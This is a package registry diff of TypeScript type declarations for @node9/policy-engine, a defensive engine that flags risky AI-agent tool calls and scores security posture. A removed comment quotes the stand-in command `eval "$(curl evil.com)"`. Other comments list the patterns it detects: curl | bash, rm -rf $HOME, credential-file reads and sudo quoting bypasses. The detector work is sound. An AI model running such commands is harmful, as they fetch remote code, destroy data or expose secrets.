@node9/policy-engine 1.0.0 → 1.5.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
package/dist/index.d.ts CHANGED
@@ -133,20 +133,6 @@ declare function redactText(text: string): {
133
133
  found: string[];
134
134
  };
135
135
 
136
- /**
137
- * Normalizes a bash command string for policy rule matching by replacing
138
- * pure-literal quoted strings that follow known message flags (e.g. -m, --body)
139
- * with empty double-quotes. This prevents text inside commit messages and PR
140
- * descriptions from triggering shell security rules.
141
- *
142
- * Unlike a regex-based approach, this uses the AST so it handles all quoting
143
- * styles correctly and won't over-strip. Execution flags like -c and -e
144
- * (psql, node, python) are intentionally left alone so their SQL/code
145
- * content continues to be evaluated by smart rules.
146
- *
147
- * Dynamic content (CmdSubst, ParamExp) inside double-quotes is never stripped
148
- * so patterns like `eval "$(curl evil.com)"` are always preserved.
149
- */
150
136
  declare function normalizeCommandForPolicy(command: string): string;
151
137
  /**
152
138
  * AST-based detection of dangerous shell execution patterns.
@@ -164,6 +150,22 @@ declare function normalizeCommandForPolicy(command: string): string;
164
150
  declare function detectDangerousShellExec(command: string): 'block' | 'review' | null;
165
151
  /** @deprecated Use detectDangerousShellExec — kept for backwards compatibility */
166
152
  declare const detectDangerousEval: typeof detectDangerousShellExec;
153
+ interface FsOpVerdict {
154
+ ruleName: string;
155
+ verdict: 'block' | 'review';
156
+ reason: string;
157
+ /** The actual path argument from the user's command — for explainability. */
158
+ path: string;
159
+ }
160
+ declare const BASH_TOOL_NAMES: Set<string>;
161
+ declare function isBashTool(toolName: string): boolean;
162
+ declare const AST_FS_REGEX_RULES: Set<string>;
163
+ /**
164
+ * True when `path` is under $HOME (~ or absolute /home/* or /root) AND not in
165
+ * the tool-managed cache allow-list. Used to gate `rm -rf` on home paths.
166
+ */
167
+ declare function isProtectedHomePath(rawPath: string): boolean;
168
+ declare function analyzeFsOperation(command: string): FsOpVerdict | null;
167
169
  interface ShellCommandAnalysis {
168
170
  /** First word of every CallExpr — the command names invoked. */
169
171
  actions: string[];
@@ -313,7 +315,8 @@ declare function isIgnoredTool(toolName: string, config: PolicyConfig): boolean;
313
315
  declare function matchesPattern(text: string, patterns: string[] | string): boolean;
314
316
  /**
315
317
  * Reads `obj.a.b.c` style nested keys. Returns null when any segment is
316
- * missing or the parent isn't an object.
318
+ * missing, the parent isn't an object, or the path attempts to walk the
319
+ * prototype chain (`__proto__`, `constructor`, `prototype`).
317
320
  */
318
321
  declare function getNestedValue(obj: unknown, path: string): unknown;
319
322
  /**
@@ -409,7 +412,537 @@ interface LoopWindowEvaluation {
409
412
  */
410
413
  declare function evaluateLoopWindow(records: ToolCallRecord[], tool: string, args: unknown, threshold: number, windowMs: number, now: number): LoopWindowEvaluation;
411
414
 
415
+ /**
416
+ * One finding extracted from a JSONL delta scan. The host produces these
417
+ * per-line; the engine aggregates them into a summary. `lineIndex` is local
418
+ * to the JSONL file and not exfiltrated outside this struct — only the
419
+ * count of findings matters at the workspace level.
420
+ */
421
+ interface ScanFinding {
422
+ /** sessionId from the Claude Code JSONL line, used to bucket findings. */
423
+ sessionId: string;
424
+ /**
425
+ * What kind of finding. New extractors should add their own type here
426
+ * rather than overloading existing ones.
427
+ */
428
+ type: 'dlp' | 'pii' | 'sensitive-file-read' | 'privilege-escalation' | 'network-exfil' | 'pipe-to-shell' | 'eval-of-remote' | 'destructive-op' | 'loop' | 'long-output-redacted';
429
+ /** DLP / PII pattern that matched, e.g. "GitHub Token" or "Email". */
430
+ patternName?: string;
431
+ /** Local line index within the source JSONL — never exfiltrated. */
432
+ lineIndex: number;
433
+ }
434
+ /**
435
+ * Per-signal counts. Adding a new signal extractor means adding a new key
436
+ * here; the FE will render it from this dict without code changes once
437
+ * the chart is wired up.
438
+ */
439
+ interface ScanSignals {
440
+ dlpFindings: number;
441
+ piiFindings: number;
442
+ sensitiveFileReads: number;
443
+ privilegeEscalation: number;
444
+ networkExfil: number;
445
+ pipeToShell: number;
446
+ evalOfRemote: number;
447
+ destructiveOps: number;
448
+ loops: number;
449
+ longOutputRedactions: number;
450
+ }
451
+ /**
452
+ * Compact, network-safe summary of a scan delta. This is the shape the
453
+ * proxy sends to the SaaS on every policy-sync tick. The SaaS persists it
454
+ * per-machine (1:1 with apiKey) and aggregates across the workspace for
455
+ * the dashboard's Recent Exposure card.
456
+ *
457
+ * `score` follows the same 0-100 scale as blast: higher is cleaner. We
458
+ * deduct per finding type based on severity weights (see `computeScanScore`
459
+ * below), capped so a noisy session doesn't bottom out the score on its own.
460
+ */
461
+ interface ScanSummary {
462
+ /** Number of distinct sessionIds touched by this scan delta. */
463
+ totalSessions: number;
464
+ /** Total tool-call lines parsed across all deltas. */
465
+ totalToolCalls: number;
466
+ /** Per-signal counts. */
467
+ signals: ScanSignals;
468
+ /**
469
+ * Top DLP/PII pattern names by count, descending. Truncated to topN to
470
+ * keep payload small. Only pattern *names*; samples never surface here.
471
+ */
472
+ topPatterns: Array<{
473
+ patternName: string;
474
+ count: number;
475
+ }>;
476
+ /** 0-100 cleanliness score. */
477
+ score: number;
478
+ }
479
+ /**
480
+ * Per-finding-type score deduction. Tuned so:
481
+ * - One credential leak (-30) drops the score from 100 to 70 — at-risk
482
+ * territory, demands attention.
483
+ * - One destructive op (-15) is a yellow flag.
484
+ * - One loop (-3) is mild noise; many loops still add up.
485
+ * Total deduction is capped at 100 so the score never goes negative.
486
+ *
487
+ * Exported so the SaaS Report can reuse the same severity ladder when
488
+ * blending scan signals into the workspace risk score (see
489
+ * `classifyScanSignal` in ../severity).
490
+ */
491
+ declare const SCAN_SIGNAL_WEIGHTS: Record<keyof ScanSignals, number>;
492
+ /**
493
+ * Compute the 0-100 cleanliness score. Public so other engine consumers
494
+ * can use the same weights without round-tripping through summarizeScan.
495
+ */
496
+ declare function computeScanScore(signals: ScanSignals): number;
497
+ declare const LOOP_THRESHOLD_FOR_WASTE = 3;
498
+ declare const COST_PER_LOOP_ITER_USD = 0.006;
499
+ /**
500
+ * Build the network-safe summary from a list of findings + total tool-call
501
+ * count. Deterministic: given the same input the output is identical
502
+ * (important for SaaS-side dedup and ETag-style caching of subsequent
503
+ * tick payloads).
504
+ *
505
+ * Top patterns are sorted by count desc, then alphabetically for stable
506
+ * ordering across calls. topN defaults to 10.
507
+ */
508
+ declare function summarizeScan(findings: ScanFinding[], opts?: {
509
+ totalToolCalls?: number;
510
+ topN?: number;
511
+ }): ScanSummary;
512
+
513
+ type Severity = 'critical' | 'high' | 'medium';
514
+ type ScoreTier = 'good' | 'at-risk' | 'critical';
515
+ /**
516
+ * Classify a rule by its name + verdict. Used by the proxy when scanning a
517
+ * Claude Code session — the rule that matched is known by name.
518
+ *
519
+ * Tiers:
520
+ * - critical: irreversible damage or credential exfiltration
521
+ * (rm -rf $HOME, eval-of-remote, AWS/SSH/GCP credential reads,
522
+ * repo deletion, helm uninstall, drop-table, drop-database, flushall,
523
+ * curl | bash, pipe-shell)
524
+ * - high: significant damage, recoverable
525
+ * (force push, git reset --hard, rebase, branch deletion, all other
526
+ * block-verdict rules)
527
+ * - medium: workflow / cost risk, not security
528
+ * (rm review, sudo review, redis config-set, dynamic eval, all other
529
+ * review-verdict rules)
530
+ */
531
+ declare function classifyRuleSeverity(name: string, verdict: 'block' | 'review' | 'allow'): Severity;
532
+ /**
533
+ * Map a rule slug to a friendly label suitable for narrative output.
534
+ *
535
+ * "block-read-aws" → "AWS credentials read"
536
+ * "shield:k8s:block-helm-uninstall" → "helm uninstall"
537
+ * "review-force-push" → "force pushes"
538
+ *
539
+ * Strips common prefixes (block-, review-, allow-, shield:..., org:) before
540
+ * matching, so cloud-tagged rules ("org:block-read-aws") map the same way.
541
+ */
542
+ declare function narrativeRuleLabel(name: string): string;
543
+ /**
544
+ * Audit-log entry for backend classification. Mirrors the relevant subset of
545
+ * AuditLog rows so backend code can pass them in without a Prisma dependency
546
+ * here.
547
+ */
548
+ interface AuditEntryForClassify {
549
+ checkedBy?: string | null;
550
+ toolName: string;
551
+ action: string;
552
+ riskMetadata?: {
553
+ ruleName?: string;
554
+ dlpPattern?: string;
555
+ [k: string]: unknown;
556
+ } | null;
557
+ }
558
+ /**
559
+ * Classify a single audit-log entry by what fired and which tool ran. Used by
560
+ * the SaaS /report endpoint to bucket audit events into severity tiers.
561
+ *
562
+ * Resolution order — first hit wins:
563
+ * 1. riskMetadata.ruleName → defer to classifyRuleSeverity (best signal)
564
+ * 2. checkedBy === 'dlp-block' or starts with 'dlp-saas:' → critical
565
+ * (any credential leak is critical regardless of which pattern matched)
566
+ * 3. checkedBy starts with 'eval-saas' or 'pipe-chain-saas:critical' → critical
567
+ * 4. checkedBy === 'loop-detected' → medium (cost / workflow, not security)
568
+ * 5. Block-status entries with no rule name → high (default for unattributed
569
+ * blocks; better than dropping the signal)
570
+ * 6. Otherwise → null (allowed actions don't have a severity)
571
+ */
572
+ declare function classifyAuditEntry(entry: AuditEntryForClassify): Severity | null;
573
+ /**
574
+ * Compute a 0-100 risk-posture score from severity counts + total events.
575
+ *
576
+ * Heuristic: each severity tier has a "cost" against a clean 100 score.
577
+ * Critical findings deduct the most, medium the least. Counts are normalised
578
+ * by total events so a workspace with 1 critical out of 10 events scores
579
+ * worse than one with 1 critical out of 10,000 — exposure rate matters more
580
+ * than absolute count.
581
+ *
582
+ * Tiers:
583
+ * - good : score ≥ 80
584
+ * - at-risk : 50 ≤ score < 80
585
+ * - critical : score < 50
586
+ *
587
+ * Empty workspaces (total === 0) score 100/good — no evidence of exposure
588
+ * is the only honest answer.
589
+ */
590
+ declare function computeSecurityScore(opts: {
591
+ critical: number;
592
+ high: number;
593
+ medium: number;
594
+ total: number;
595
+ }): {
596
+ score: number;
597
+ tier: ScoreTier;
598
+ };
599
+ /**
600
+ * Map a ScanSignals key to its severity tier. Uses the existing
601
+ * SCAN_SIGNAL_WEIGHTS so adding a new scan signal type only requires
602
+ * updating the weights table; classification follows automatically.
603
+ *
604
+ * Thresholds:
605
+ * - ≥ 25 → critical (dlp, pipeToShell, evalOfRemote, networkExfil)
606
+ * - ≥ 11 → high (sensitiveFileReads, privilegeEscalation,
607
+ * destructiveOps)
608
+ * - else → medium (piiFindings, loops, longOutputRedactions)
609
+ */
610
+ declare function classifyScanSignal(key: keyof ScanSignals): Severity;
611
+ /**
612
+ * Compute a 0-100 risk-posture score that blends audit-log severity counts
613
+ * with forward-only scan signal counts.
614
+ *
615
+ * Why this exists: the live audit log answers "what did the firewall block
616
+ * in this window?" and the scan answers "what's sitting in past sessions?".
617
+ * Both are real risk; surfacing them as two separate scores forced users
618
+ * to reconcile two numbers. This function bins scan signals into the same
619
+ * critical/high/medium buckets via classifyScanSignal, sums them with the
620
+ * audit counts, and runs the existing computeSecurityScore math.
621
+ *
622
+ * Denominator handling: a workspace with zero audit traffic but non-zero
623
+ * scan findings would otherwise hit the `total === 0` short-circuit and
624
+ * return 100/good — a false-healthy reading. We add the scan contribution
625
+ * to `total` so the rate-based math runs:
626
+ *
627
+ * - If `scan.totalToolCalls` is provided, use it as the scan-side
628
+ * denominator (best signal — "1 finding per 10000 calls" should
629
+ * score better than "1 per 10").
630
+ * - Otherwise fall back to the count of scan findings, so a scan-only
631
+ * workspace with one credential leak resolves to 1/1 = 100% bad
632
+ * rate and lands in critical, not 0/0 = 100/good.
633
+ *
634
+ * Backwards compatible: calling with `audit` only and no `scan` produces
635
+ * the exact same result as `computeSecurityScore(audit)`.
636
+ */
637
+ declare function computeBlendedSecurityScore(opts: {
638
+ audit: {
639
+ critical: number;
640
+ high: number;
641
+ medium: number;
642
+ total: number;
643
+ };
644
+ scan?: {
645
+ signals: ScanSignals;
646
+ totalToolCalls?: number;
647
+ };
648
+ }): {
649
+ score: number;
650
+ tier: ScoreTier;
651
+ };
652
+
653
+ /**
654
+ * One sensitive path that the blast walker found readable on disk.
655
+ * `score` is the per-finding deduction this path contributes to the
656
+ * machine's overall blast-radius score (100 = clean).
657
+ */
658
+ interface BlastFinding {
659
+ /** Absolute path on disk. May be home-relative ("~/.aws/credentials"). */
660
+ full: string;
661
+ /** Display label — short form for UI ("~/.ssh/id_rsa", ".env (cwd)"). */
662
+ label: string;
663
+ /** One-line explanation of why this path matters. */
664
+ description: string;
665
+ /** Points deducted from the 100-point score when this path is reachable. */
666
+ score: number;
667
+ }
668
+ /** One environment variable the DLP scanner flagged as a credential. */
669
+ interface BlastEnvFinding {
670
+ /** Variable name, e.g. "AWS_SECRET_ACCESS_KEY". */
671
+ key: string;
672
+ /** DLP pattern that matched, e.g. "AWS Access Key". */
673
+ patternName: string;
674
+ }
675
+ /** Full result of a blast walk on one machine. */
676
+ interface BlastResult {
677
+ reachable: BlastFinding[];
678
+ envFindings: BlastEnvFinding[];
679
+ /** 0-100. Higher is better. */
680
+ score: number;
681
+ }
682
+ /**
683
+ * Compact, network-safe summary of a blast result. This is the shape the
684
+ * proxy sends to the SaaS and the SaaS persists per machine. We deliberately
685
+ * DO NOT send file contents, full paths, or sample values — only:
686
+ * - the score (already aggregate)
687
+ * - a count of how many things were exposed
688
+ * - the top-N worst paths' sanitised labels (truncated to 2 segments)
689
+ *
690
+ * The sanitisation step lives here in the engine so both the proxy (before
691
+ * send) and the SaaS (when validating) reference identical logic.
692
+ */
693
+ interface BlastSummary {
694
+ /** 0-100. Same as BlastResult.score. */
695
+ score: number;
696
+ /** reachable.length + envFindings.length — total exposure count. */
697
+ exposureCount: number;
698
+ /**
699
+ * Top-N worst findings (sorted by individual score deduction desc).
700
+ * Paths are truncated to the last 2 segments so we never exfiltrate
701
+ * project-layout details ("payments-prod/.env.production") — only the
702
+ * basename + parent ("payments-prod/.env.production" → ".env.production"
703
+ * if 1-segment, "payments-prod/.env.production" if 2-segment).
704
+ */
705
+ worstPaths: Array<{
706
+ path: string;
707
+ score: number;
708
+ }>;
709
+ /** Number of env vars flagged as credentials. No keys included. */
710
+ envExposureCount: number;
711
+ }
712
+ /**
713
+ * Sanitise a sensitive path for transmission. Keeps only the trailing 2
714
+ * segments — enough to identify the kind of file ("~/.aws/credentials"
715
+ * stays useful, "/Users/alice/Code/payments-prod/.env" becomes
716
+ * "payments-prod/.env" which doesn't reveal the home dir or directory tree).
717
+ *
718
+ * Edge cases:
719
+ * - Already short paths (≤2 segments) are returned as-is.
720
+ * - Paths with a leading "~" are kept as-is up to 2 segments.
721
+ * - Empty strings return "".
722
+ *
723
+ * Exported for unit tests + reuse anywhere a path needs the same treatment.
724
+ */
725
+ declare function truncateBlastPath(full: string): string;
726
+ /**
727
+ * Build the network-safe summary from a full BlastResult. Deterministic:
728
+ * given the same input the output is identical (important for caching /
729
+ * deduplication on the SaaS side). Top-N defaults to 5, configurable for
730
+ * tests.
731
+ */
732
+ declare function summarizeBlast(result: BlastResult, opts?: {
733
+ topN?: number;
734
+ }): BlastSummary;
735
+
736
+ /**
737
+ * Destructive-op regex. Word-boundary anchored so partial matches don't
738
+ * fire (e.g. "term" inside "terminate" wouldn't match `\brm\b`). Each
739
+ * pattern is independently provable as destructive — no fuzzy heuristics.
740
+ */
741
+ declare const DESTRUCTIVE_OP_RE: RegExp;
742
+ /**
743
+ * Historical privilege-escalation regex. **No longer used by the canonical
744
+ * detector** — scan/canonical.ts moved sudo/su, chmod, and chown all to
745
+ * AST tokenization (analyzeShellCommand actions + allTokens) so:
746
+ * - Quoting bypasses (`s''udo`, `c\hmod`) don't slip past the matcher.
747
+ * - String literals like `echo "chmod 777 done"` or `cat /etc/sudoers`
748
+ * stop firing false positives — those don't put the action name in
749
+ * `actions`, only in `allTokens` (a Lit, not a CallExpr first-word).
750
+ *
751
+ * Kept as a public export for non-AST consumers that grep raw command
752
+ * strings (smart-rule conditions that match on the literal command text)
753
+ * and as documentation of the historical pattern set. Removing it would
754
+ * be a breaking change for downstream package consumers.
755
+ */
756
+ declare const PRIVILEGE_ESCALATION_RE: RegExp;
757
+ /**
758
+ * Sensitive file paths the agent shouldn't be reading via tool calls.
759
+ * Mirrors the blast walker's path set — same files matter, here detected
760
+ * at tool-call-time rather than fs-walk-time.
761
+ *
762
+ * `\b` boundaries on names so substring noise doesn't trigger; the
763
+ * patterns assume the proxy normalises ~ in inputs (which it does
764
+ * via path expansion before we see them).
765
+ */
766
+ declare const SENSITIVE_PATH_RE: RegExp;
767
+ /**
768
+ * Tool names that read or grep file contents. Used to gate SENSITIVE_PATH_RE
769
+ * to file-reading tools so the same path appearing in a Bash command doesn't
770
+ * double-count against a Read of the same file.
771
+ */
772
+ declare const FILE_TOOLS: Set<string>;
773
+
774
+ type PiiPattern = 'Email' | 'SSN' | 'Phone' | 'Credit Card';
775
+ /**
776
+ * Detect PII patterns in a string. Returns a deduplicated list — one entry
777
+ * per distinct pattern type, never multiple "Email" findings from one input.
778
+ */
779
+ declare function detectPii(text: string): PiiPattern[];
780
+
781
+ type CanonicalFindingType = 'smart-rule' | 'ast-fs-op' | 'dlp' | 'pii' | 'sensitive-file-read' | 'privilege-escalation' | 'destructive-op' | 'pipe-to-shell' | 'eval-of-remote' | 'loop' | 'long-output-redacted';
782
+ type CanonicalAgent = 'claude' | 'gemini' | 'codex' | 'shell';
783
+ type CanonicalSourceType = 'default' | 'shield' | 'user' | 'engine';
784
+ interface CanonicalFinding {
785
+ /** Discriminator. Maps 1:1 to ScanFinding.type for the SaaS upload. */
786
+ type: CanonicalFindingType;
787
+ /**
788
+ * Stable rule identifier. For type='smart-rule' / 'ast-fs-op' it's the
789
+ * rule name (e.g. 'block-rm-rf-home', 'shield:project-jail:block-read-ssh').
790
+ * For built-in detector findings (PII, DLP, regex), a synthetic name keyed
791
+ * on the detector + pattern (e.g. 'pii:email', 'dlp:GitHub Token').
792
+ */
793
+ ruleName: string;
794
+ /** Block or review. Findings only exist for fired rules — no allow/info. */
795
+ verdict: 'block' | 'review';
796
+ /** Severity tier. Single source of truth — produced once at the engine. */
797
+ severity: Severity;
798
+ /** Engine-generated reason. Never carries user PII or raw secrets. */
799
+ reason: string;
800
+ /** Pattern name for DLP/PII (e.g. 'GitHub Token', 'Email'). */
801
+ patternName?: string;
802
+ /** Tool that produced the call. */
803
+ toolName: string;
804
+ agent: CanonicalAgent;
805
+ sessionId: string;
806
+ /** Project label or working directory the session lives in. */
807
+ project: string;
808
+ /** Local JSONL line offset. Never exfiltrated; used for dedupe. */
809
+ lineIndex: number;
810
+ /** Where the rule came from. 'engine' for built-in detectors. */
811
+ sourceType: CanonicalSourceType;
812
+ /** Optional shield/source label for UI. */
813
+ shieldLabel?: string;
814
+ /** When this exact (post-dedupe) finding was first / last seen. */
815
+ firstSeenAt: string;
816
+ lastSeenAt: string;
817
+ /** Post-dedupe match count. 1 by default, N for N collapsed raw matches. */
818
+ occurrenceCount: number;
819
+ /** AST findings: the path that triggered the verdict. */
820
+ subjectPath?: string;
821
+ /** Loop findings: dollar cost so far. Loop-only today; optional everywhere. */
822
+ costUsd?: number;
823
+ /** Loop findings: number of iterations. */
824
+ loopCount?: number;
825
+ loopKind?: 'loop' | 'long-iteration';
826
+ /** Loop findings: a sanitized command preview for UI. */
827
+ commandPreview?: string;
828
+ /** Raw tool input. Local CLI render only. */
829
+ input?: Record<string, unknown>;
830
+ /** DLP UI: first/last chars of the matched value with the middle replaced. */
831
+ redactedSample?: string;
832
+ }
833
+ /**
834
+ * Normalized per-call entry the per-line extractor consumes. Hosts (CLI
835
+ * scan, daemon, backfill) parse agent-specific JSONL into this shape so
836
+ * extractCanonicalFindings doesn't have to know about Claude vs Gemini vs
837
+ * Codex line layouts.
838
+ */
839
+ interface ToolCallEntry {
840
+ toolName: string;
841
+ args: Record<string, unknown>;
842
+ timestamp: string;
843
+ /** Bytes of tool result content for long-output detection. 0 / undefined
844
+ * for non-result entries. */
845
+ outputBytes?: number;
846
+ }
847
+ interface ExtractContext {
848
+ sessionId: string;
849
+ lineIndex: number;
850
+ project: string;
851
+ agent: CanonicalAgent;
852
+ rules: ReadonlyArray<{
853
+ rule: SmartRule;
854
+ sourceType: CanonicalSourceType;
855
+ shieldLabel?: string;
856
+ }>;
857
+ /** toolInspection map from PolicyConfig — drives shell-command extraction
858
+ * for tools that aren't the standard 'bash' name. Defaults handled by caller. */
859
+ toolInspection: Record<string, string>;
860
+ /** DLP enabled flag from PolicyConfig. */
861
+ dlpEnabled: boolean;
862
+ }
863
+ interface SessionExtractContext {
864
+ sessionId: string;
865
+ project: string;
866
+ agent: CanonicalAgent;
867
+ /**
868
+ * Loop-detection window settings. Mirrors PolicyConfig.policy.loopDetection.
869
+ *
870
+ * `windowSeconds: 0` means "no window" — count all matching calls in the
871
+ * session regardless of timing. This is the right setting for historical
872
+ * backfill (--upload-history): an agent that hammered the same Edit on
873
+ * the same file 126 times across hours is the loop pattern users care
874
+ * about, but a 120s window would never fire on it. The live hook keeps
875
+ * the small window because it's racing against an actively running agent.
876
+ */
877
+ loopDetection: {
878
+ enabled: boolean;
879
+ threshold: number;
880
+ windowSeconds: number;
881
+ };
882
+ }
883
+ interface SessionToolCall extends ToolCallEntry {
884
+ /** Local JSONL line where this call lived — propagates to the loop finding. */
885
+ lineIndex: number;
886
+ }
887
+ declare const LONG_OUTPUT_THRESHOLD_BYTES: number;
888
+ /**
889
+ * Wire-format identity of the canonical detector pipeline. Bumped when
890
+ * extractCanonicalFindings (and friends) change their output in a way
891
+ * that would invalidate verdicts already recorded against the previous
892
+ * version. The daemon stores this in ~/.node9/scan-watermark.json and
893
+ * triggers a one-time re-scan when its persisted value falls behind.
894
+ *
895
+ * Bump it when:
896
+ * - adding/removing a CanonicalFindingType
897
+ * - changing severity classification for an existing type
898
+ * - changing dedupe keys (would silently re-bucket existing findings)
899
+ * - any semantic change to the detectors that affects emitted counts
900
+ *
901
+ * Don't bump for:
902
+ * - comment-only edits
903
+ * - jsdoc tweaks
904
+ * - refactors that demonstrably preserve output
905
+ *
906
+ * scripts/check-extractor-version.mjs hashes the detector source files
907
+ * and fails CI when the hash drifts without a version bump — forgetting
908
+ * is loud, not silent.
909
+ */
910
+ declare const CANONICAL_EXTRACTOR_VERSION = "canonical-v4";
911
+ /**
912
+ * SHA-256 prefix of the detector-source files
913
+ * (canonical.ts + pii.ts + destructive-regex.ts).
914
+ *
915
+ * Updated by `npm run bump-extractor-version`. The CI gate in
916
+ * `.github/workflows/ci.yml` recomputes the hash on every push and fails
917
+ * if it doesn't match this constant — the contract is "if any of those
918
+ * files changed, this hash must change too, and you must consciously
919
+ * decide whether to bump CANONICAL_EXTRACTOR_VERSION."
920
+ */
921
+ declare const CANONICAL_EXTRACTOR_HASH = "64a6a63a27f4646f";
922
+ declare function extractCanonicalFindings(call: ToolCallEntry, ctx: ExtractContext): CanonicalFinding[];
923
+ declare function extractSessionLevelFindings(calls: ReadonlyArray<SessionToolCall>, ctx: SessionExtractContext): CanonicalFinding[];
924
+ /**
925
+ * Collapse equivalent findings into one row, summing occurrenceCount and
926
+ * spreading firstSeenAt / lastSeenAt across the matches. Dedupe key is
927
+ * (type, ruleName, command-preview, project, agent) — same shape scan.ts
928
+ * uses today (line 502), with `agent` added so cross-agent matches stay
929
+ * separated for the dashboard's per-agent breakdown.
930
+ */
931
+ declare function dedupeCanonicalFindings(findings: ReadonlyArray<CanonicalFinding>): CanonicalFinding[];
932
+ /**
933
+ * Project a CanonicalFinding into the privacy-safe ScanFinding shape the
934
+ * proxy sends to the SaaS. Drops `input`, `redactedSample`, `commandPreview`,
935
+ * `subjectPath` — anything that could carry user content. Counts and pattern
936
+ * names only, matching the privacy invariant in scan/index.ts.
937
+ *
938
+ * Returns null if the type doesn't have a corresponding ScanFinding bucket
939
+ * (currently `smart-rule` and `ast-fs-op` — those carry a user-defined or
940
+ * shield rule name and aren't part of the count-based summary).
941
+ */
942
+ declare function toScanFinding(c: CanonicalFinding): ScanFinding | null;
943
+ declare function previewArgs(input: Record<string, unknown>, max: number): string;
944
+
412
945
  /** Engine version stamped on audit entries for future drift detection. */
413
- declare const ENGINE_VERSION = "1.0.0";
946
+ declare const ENGINE_VERSION = "1.4.0";
414
947
 
415
- export { BUILTIN_SHIELDS, DLP_PATTERNS, type DlpMatch, ENGINE_VERSION, FLAGS_WITH_VALUES, LOOP_MAX_RECORDS, type LoopWindowEvaluation, type PipeChainAnalysis, type PolicyConfig, type PolicyContext, type PolicyHostHooks, type PolicyVerdict, type ProvenanceLookup, type ProvenanceTrust, type RiskMetadata, SENSITIVE_PATH_REGEXES, type ShellCommandAnalysis, type ShieldDefinition, type ShieldOverrides, type ShieldVerdict, type SmartCondition, type SmartRule, type ToolCallRecord, analyzePipeChain, analyzeShellCommand, checkDangerousSql, computeArgsHash, detectDangerousEval, detectDangerousShellExec, evaluateLoopWindow, evaluatePolicy, evaluateSmartConditions, extractAllSshHosts, extractNetworkTargets, extractPositionalArgs, getCompiledRegex, getNestedValue, isIgnoredTool, isShieldVerdict, matchSensitivePath, matchesPattern, normalizeCommandForPolicy, parseAllSshHostsFromCommand, redactText, scanArgs, scanText, sensitivePathMatch, validateOverrides, validateRegex, validateShieldDefinition };
948
+ export { AST_FS_REGEX_RULES, type AuditEntryForClassify, BASH_TOOL_NAMES, BUILTIN_SHIELDS, type BlastEnvFinding, type BlastFinding, type BlastResult, type BlastSummary, CANONICAL_EXTRACTOR_HASH, CANONICAL_EXTRACTOR_VERSION, COST_PER_LOOP_ITER_USD, type CanonicalAgent, type CanonicalFinding, type CanonicalFindingType, type CanonicalSourceType, DESTRUCTIVE_OP_RE, DLP_PATTERNS, type DlpMatch, ENGINE_VERSION, type ExtractContext, FILE_TOOLS, FLAGS_WITH_VALUES, type FsOpVerdict, LONG_OUTPUT_THRESHOLD_BYTES, LOOP_MAX_RECORDS, LOOP_THRESHOLD_FOR_WASTE, type LoopWindowEvaluation, PRIVILEGE_ESCALATION_RE, type PiiPattern, type PipeChainAnalysis, type PolicyConfig, type PolicyContext, type PolicyHostHooks, type PolicyVerdict, type ProvenanceLookup, type ProvenanceTrust, type RiskMetadata, SCAN_SIGNAL_WEIGHTS, SENSITIVE_PATH_RE, SENSITIVE_PATH_REGEXES, type ScanFinding, type ScanSignals, type ScanSummary, type ScoreTier, type SessionExtractContext, type SessionToolCall, type Severity, type ShellCommandAnalysis, type ShieldDefinition, type ShieldOverrides, type ShieldVerdict, type SmartCondition, type SmartRule, type ToolCallEntry, type ToolCallRecord, analyzeFsOperation, analyzePipeChain, analyzeShellCommand, checkDangerousSql, classifyAuditEntry, classifyRuleSeverity, classifyScanSignal, computeArgsHash, computeBlendedSecurityScore, computeScanScore, computeSecurityScore, dedupeCanonicalFindings, detectDangerousEval, detectDangerousShellExec, detectPii, evaluateLoopWindow, evaluatePolicy, evaluateSmartConditions, extractAllSshHosts, extractCanonicalFindings, extractNetworkTargets, extractPositionalArgs, extractSessionLevelFindings, getCompiledRegex, getNestedValue, isBashTool, isIgnoredTool, isProtectedHomePath, isShieldVerdict, matchSensitivePath, matchesPattern, narrativeRuleLabel, normalizeCommandForPolicy, parseAllSshHostsFromCommand, previewArgs, redactText, scanArgs, scanText, sensitivePathMatch, summarizeBlast, summarizeScan, toScanFinding, truncateBlastPath, validateOverrides, validateRegex, validateShieldDefinition };